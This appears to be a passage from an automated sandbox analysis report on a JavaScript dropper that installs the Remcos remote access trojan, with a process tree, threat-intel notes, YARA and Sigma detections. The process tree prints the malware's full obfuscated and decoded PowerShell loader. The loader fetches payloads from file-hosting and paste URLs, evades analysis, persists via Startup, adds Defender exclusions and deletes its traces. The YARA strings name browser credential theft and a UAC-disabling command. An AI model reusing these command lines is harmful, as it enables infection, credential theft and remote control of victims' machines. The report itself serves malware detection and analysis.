'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAEUAdQ' + [char]66 + 'UAFoAQQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAIAApAC4AJwAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + '0AHgAdAAuADUAMgAwADIALQ' + [char]66 + 'ZAHoAWAAtAGQAQQ' + [char]66 + 'lAFIAcA' + [char]66 + 'TAC0ATQ' + [char]66 + 'lAFIALw' + [char]66 + 'tAG8AYwAuAHMAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'lAG4Abw' + [char]66 + 'oAHIAZQ' + [char]66 + 'yAHUAZQ' + [char]66 + 'tAGUAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAnACAALAAgACcAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcAJwAgACwAIAAgACcAJw' + [char]66 + 'EACAARA' + [char]66 + 'EAGMAOg' + [char]66 + 'cAHcAaQ' + [char]66 + 'uAGQAbw' + [char]66 + '3AHMAXA' + [char]66 + 'tAGkAYw' + [char]66 + 'yAG8Acw' + [char]66 + 'vAGYAdAAuAG4AZQ' + [char]66 + '0AFwAZg' + [char]66 + 'yAGEAbQ' + [char]66 + 'lAHcAbw' + [char]66 + 'yAGsAXA' + [char]66 + '2ADQALgAwAC4AMwAwADMAMQA5AFwAYQ' + [char]66 + 'kAGQAaQ' + [char]66 + 'uAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAMwAyACcAJwAgACkAIAApADsAJwA7ACQAWA' + [char]66 + '2AEMAVA' + [char]66 + 'pACAAPQAgACgAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMwAuAHAAcwAxACcAKQAgADsAJA' + [char]66 + 'FAHUAVA' + [char]66 + 'aAEEAIA' + [char]66 + '8ACAATw' + [char]66 + '1AHQALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lAFAAYQ' + [char]66 + '0AGgAIAAkAFgAdg' + [char]66 + 'DAFQAaQAgACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwAIAAtAEUAeA' + [char]66 + 'lAGMAdQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAFAAbw' + [char]66 + 'sAGkAYw' + [char]66 + '5ACAAQg' + [char]66 + '5AHAAYQ' + [char]66 + 'zAHMAIAAtAEYAaQ' + [char]66 + 'sAGUAIAAkAFgAdg' + [char]66 + 'DAFQAaQAgADsAfQA7AA==';$WgkXZ = $WgkXZ.replace('?','B') ;$WgkXZ = [System.Convert]::FromBase64String( $WgkXZ ) ;;;$WgkXZ = [System.Text.Encoding]::Unicode.GetString( $WgkXZ ) ;$WgkXZ = $WgkXZ.replace('%DCPJU%','C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js') ;powershell $WgkXZ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 8148 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 7608 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 7560 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 2028 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • cmd.exe (PID: 8140 cmdline: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • PING.EXE (PID: 7092 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • powershell.exe (PID: 7616 cmdline: powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 380 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7656 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 3760 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 2956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 6048 cmdline: cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 2948 cmdline: powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 5784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 5496 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\idksg.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 1476 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hrhqu.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 8956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • AddInProcess32.exe (PID: 8380 cmdline: #by-unknown MD5: 9827FF3CDF4B83F9C86354606736CA9C)
              • chrome.exe (PID: 8652 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
              • AddInProcess32.exe (PID: 8732 cmdline: c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe /stext "C:\Users\user\AppData\Local\Temp\phlxtjpg" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
              • AddInProcess32.exe (PID: 8740 cmdline: c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajqhtbaiibn" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
              • AddInProcess32.exe (PID: 8760 cmdline: c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe /stext "C:\Users\user\AppData\Local\Temp\cddauulbwjfhif" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
              • msedge.exe (PID: 8792 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • cmd.exe (PID: 6804 cmdline: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • OpenWith.exe (PID: 7964 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
    • firefox.exe (PID: 1704 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 7712 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • firefox.exe (PID: 2028 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2216 -prefMapHandle 2200 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4ecd2f9-4327-4118-b575-326c3d8b529d} 7712 "\\.\pipe\gecko-crash-server-pipe.7712" 290e916ff10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • firefox.exe (PID: 5772 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4024 -parentBuildID 20230927232528 -prefsHandle 4180 -prefMapHandle 4176 -prefsLen 26099 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {229911da-61b2-4021-aed6-5898497fc069} 7712 "\\.\pipe\gecko-crash-server-pipe.7712" 290e9140e10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c708:$a1: Remcos restarted by watchdog!
              • 0x6cc80:$a3: %02i:%02i:%02i:%03i
              00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
              • 0x66994:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x67410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x66a04:$str_b2: Executing file:
              • 0x6784c:$str_b3: GetDirectListeningPort
              • 0x67200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67380:$str_b7: \update.vbs
              • 0x66a2c:$str_b9: Downloaded file:
              • 0x66a18:$str_b10: Downloading file:
              • 0x66abc:$str_b12: Failed to upload file:
              • 0x67814:$str_b13: StartForward
              • 0x67834:$str_b14: StopForward
              • 0x672d8:$str_b15: fso.DeleteFile "
              • 0x6726c:$str_b16: On Error Resume Next
              • 0x67308:$str_b17: fso.DeleteFolder "
              • 0x66aac:$str_b18: Uploaded file:
              • 0x66a6c:$str_b19: Unable to delete:
              • 0x672a0:$str_b20: while fso.FileExists("
              • 0x66f49:$str_c0: [Firefox StoredLogins not found]
              Click to see the 2 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAPQAgACgAIAAnAEMAOg' +
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQAcw' + [char]66 + 'XACAAPQAgACgAIAAnAEMAOg' +
              Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
